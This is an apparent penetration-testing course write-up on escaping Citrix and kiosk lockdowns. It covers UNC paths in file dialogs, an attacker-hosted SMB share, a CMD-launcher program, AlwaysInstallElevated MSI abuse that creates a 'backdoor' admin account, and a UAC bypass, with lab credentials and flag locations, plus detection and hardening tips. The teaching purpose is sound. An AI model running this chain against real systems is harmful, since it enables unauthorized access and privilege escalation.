Citrix Breakout involves escaping restricted virtualization environments such as Terminal Services, Citrix, AWS AppStream, CyberArk PSM, and Kiosk environments. These platforms implement lock-down measures to minimize security impact, but breakout techniques can bypass these restrictions to gain command execution and privilege escalation.
1. Gain access to a Dialog Box
2. Exploit the Dialog Box to achieve command execution
3. Escalate privileges to gain higher levels of access# Highly restrictive environments typically have:
- No cmd.exe/powershell.exe in Start Menu
- Blocked access to C:\Windows\system32 via File Explorer
- Group policy restrictions on directory browsing
- File Explorer access restrictions to sensitive paths# Applications with file interaction features provide dialog boxes:
- Save/Save As
- Open/Load
- Browse/Import/Export
- Help/Search/Scan/Print# Steps:
1. Run Paint from Start Menu
2. Click File > Open to open Dialog Box
3. Enter UNC path: \\127.0.0.1\c$\users\pmorgan
4. Set File-Type to "All Files"
5. Press Enter to gain directory access
# Result: Bypasses File Explorer restrictions# UNC paths that work in dialog boxes:
\\127.0.0.1\c$\users\<username> # Local admin share
\\<ip>\<share> # Remote SMB share
\\localhost\c$\ # Alternative localhost syntax# On attacking machine (Ubuntu/Kali):
smbserver.py -smb2support share $(pwd)
# Example output:
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0# Steps:
1. Open Paint > File > Open
2. Enter UNC path: \\<attacker_ip>\share
3. Set File-Type to "All Files"
4. Browse and execute files directly from share
# File execution:
- Right-click on executable
- Select "Open" to run directly// pwn.c - Simple CMD launcher
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}
// Compile and place on SMB share
// Right-click > Open in dialog box = CMD access# Why Explorer++:
- Portable (no installation required)
- Bypasses group policy folder restrictions
- Fast and user-friendly interface
- Can copy files where File Explorer cannot
# Usage:
1. Download Explorer++ to SMB share
2. Execute via dialog box or copy to system
3. Use for unrestricted file system access# Recommended tools:
- Explorer++ # Most popular and effective
- Q-Dir # Quad-pane file manager
- FreeCommander # Dual-pane alternative
- Total Commander # Feature-rich option# When regedit.exe is blocked by group policy:
- Simpleregedit
- Uberregedit
- SmallRegistryEditor
# These GUI tools bypass standard group policy restrictions
# Allow full registry editing capabilities# Capabilities:
- Full HKEY hive access
- Import/Export registry files
- Search functionality
- Permissions modification# Steps:
1. Right-click existing shortcut
2. Select "Properties"
3. Modify "Target" field to desired executable:
Target: C:\Windows\System32\cmd.exe
4. Execute shortcut = CMD access
# Alternative targets:
C:\Windows\System32\powershell.exe
C:\Windows\System32\mmc.exe
\\<ip>\share\<tool>.exe# PowerShell method for .lnk creation:
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Users\<user>\Desktop\pwn.lnk")
$Shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
$Shortcut.Save()# Create evil.bat:
1. Create new text file
2. Rename to "evil.bat"
3. Edit content:
cmd
4. Save and execute
# Result: Opens Command Prompt# When these extensions auto-execute:
.bat # Batch files
.vbs # VBScript files
.ps1 # PowerShell scripts
# Potential for:
- Interactive console access
- Download and launch tools
- Bypass restrictions via scripting# Check registry for Always Install Elevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both should return: REG_DWORD 0x1# Using PowerUp for MSI creation:
Import-Module .\PowerUp.ps1
Write-UserAddMSI
# Creates UserAdd.msi on desktop
# Execute to create new admin user# MSI execution creates user dialog:
Username: backdoor
Password: T3st@123 # Must meet complexity requirements
Group: Administrators
# Result: New admin user created# Switch to new admin user:
runas /user:backdoor cmd
# Enter password: T3st@123
# New CMD session as admin user# Even admin users face UAC restrictions:
C:\Windows\system32> cd C:\Users\Administrator
Access is denied.
# UAC blocks access despite admin membership# UAC bypass execution:
Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep
# Process:
- Impersonates explorer.exe
- Drops proxy DLL
- Executes sysprep for privilege escalation# Verify elevated privileges:
whoami /all
whoami /priv
# Test access:
cd C:\Users\Administrator
dir *.txt# Access method:
1. RDP to target with htb-student:HTB_@cademy_stdnt!
2. Visit http://humongousretail.com/remote/
3. Login: pmorgan:Summer1Summer! (Domain: htb.local)
4. Download launch.ica file for Citrix access# Objective: Get flag from C:\Users\pmorgan\Downloads
# Method: Dialog box bypass to access restricted directory
# Steps:
1. Open Paint > File > Open
2. Navigate to: \\127.0.0.1\c$\users\pmorgan\Downloads
3. Access flag.txt
# Flag location: C:\Users\pmorgan\Downloads\flag.txt# Objective: Get flag from C:\Users\Administrator\Desktop
# Method: Full privilege escalation chain
# Complete process:
1. Dialog box breakout for CMD access
2. Copy tools from SMB share
3. Use PowerUp for AlwaysInstallElevated
4. Create admin user with MSI
5. UAC bypass with Bypass-UAC.ps1
6. Access Administrator desktop
# Flag location: C:\Users\Administrator\Desktop\flag.txt# 1. Initial access via dialog box
Paint > File > Open > \\127.0.0.1\c$\users\<user>
# 2. SMB server setup
smbserver.py -smb2support share $(pwd)
# 3. Tool transfer and execution
\\<attacker_ip>\share\pwn.exe
# 4. Privilege enumeration
.\PowerUp.ps1
# or
.\winPEAS.exe
# 5. AlwaysInstallElevated exploitation
Write-UserAddMSI
# Execute UserAdd.msi
# 6. Admin user creation
Username: backdoor
Password: Complex@123
Group: Administrators
# 7. Context switch
runas /user:backdoor cmd
# 8. UAC bypass
Bypass-UAC -Method UacMethodSysprep
# 9. Full system access
whoami /priv
cd C:\Users\Administrator# File system access:
Explorer++.exe # Alternative file manager
Q-Dir.exe # Quad-pane explorer
# Registry access:
SmallRegistryEditor.exe # Alternative registry editor
Simpleregedit.exe # Lightweight reg editor
# Privilege escalation:
PowerUp.ps1 # Privilege escalation framework
Bypass-UAC.ps1 # UAC bypass collection
winPEAS.exe # Windows enumeration
# Custom tools:
pwn.exe # Custom CMD launcher
evil.bat # Simple batch breakout# Monitor for:
- Unusual dialog box usage patterns
- UNC path access in file dialogs
- Alternative file manager execution
- Registry editor process spawning
- MSI installation outside normal channels
- UAC bypass script execution
- SMB connections to external shares# Hardening recommendations:
- Block UNC path access in dialog boxes
- Disable Always Install Elevated policy
- Implement application allowlisting
- Monitor file manager alternatives
- Restrict SMB access to external hosts
- Enhanced UAC configuration
- Registry access restrictions
- Dialog box behavior policies- Dialog boxes provide powerful bypass mechanisms for restricted environments
- UNC paths can circumvent File Explorer restrictions
- Alternative tools (Explorer++, registry editors) bypass group policy
- SMB shares enable tool transfer and execution in restricted environments
- MSI exploitation with AlwaysInstallElevated provides reliable privilege escalation
- UAC bypass is often necessary even with admin users
- Script execution (.bat, .vbs, .ps1) can provide multiple breakout vectors
Citrix breakout techniques exploit the inherent trust in application dialog boxes and file interaction features to escape restricted virtualization environments and achieve privilege escalation.